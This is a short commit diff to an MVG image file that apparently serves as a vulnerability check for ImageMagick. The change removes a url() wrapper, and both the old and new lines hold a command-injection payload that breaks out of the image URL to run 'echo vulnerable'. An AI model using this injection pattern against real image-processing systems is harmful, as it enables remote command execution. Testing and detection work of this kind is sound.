Remove url() for MVG

Technically unnecessary here.
bug/bundler_fix
William Vu 2016-05-05 02:48:19 -05:00
parent 1bc2ec9c11
commit 2bac46097f
1 changed files with 1 additions and 1 deletions

View File

@ -3,6 +3,6 @@ encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 'url(https://localhost";echo vulnerable")'
image Over 0,0 1,1 'https://localhost";echo vulnerable"'
pop graphic-context
pop graphic-context